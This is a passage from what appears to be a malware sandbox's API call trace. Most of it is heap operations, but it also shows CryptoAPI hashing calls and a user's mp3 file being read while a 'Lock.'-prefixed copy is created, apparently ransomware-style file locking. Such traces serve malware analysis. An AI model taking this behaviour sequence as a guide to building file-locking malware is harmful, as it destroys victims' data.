lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0252.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0252.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0252.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.210] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0252.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.211] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0252.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0252.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0252.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.218] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.218] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.218] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.218] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.219] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LVDYQUpAZwEha.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lvdyqupazweha.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0252.220] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.220] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0252.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0252.220] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.220] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.220] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.221] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.LVDYQUpAZwEha.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.lvdyqupazweha.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0252.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0252.222] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0252.222] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.222] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.222] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0252.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.222] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0252.222] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xa2ab, lpOverlapped=0x0) returned 1 [0252.235] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0252.236] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0252.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa2ab) returned 0x34c2258 [0252.236] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.237] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.237] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0252.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0252.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0252.237] RtlAllocateHeap 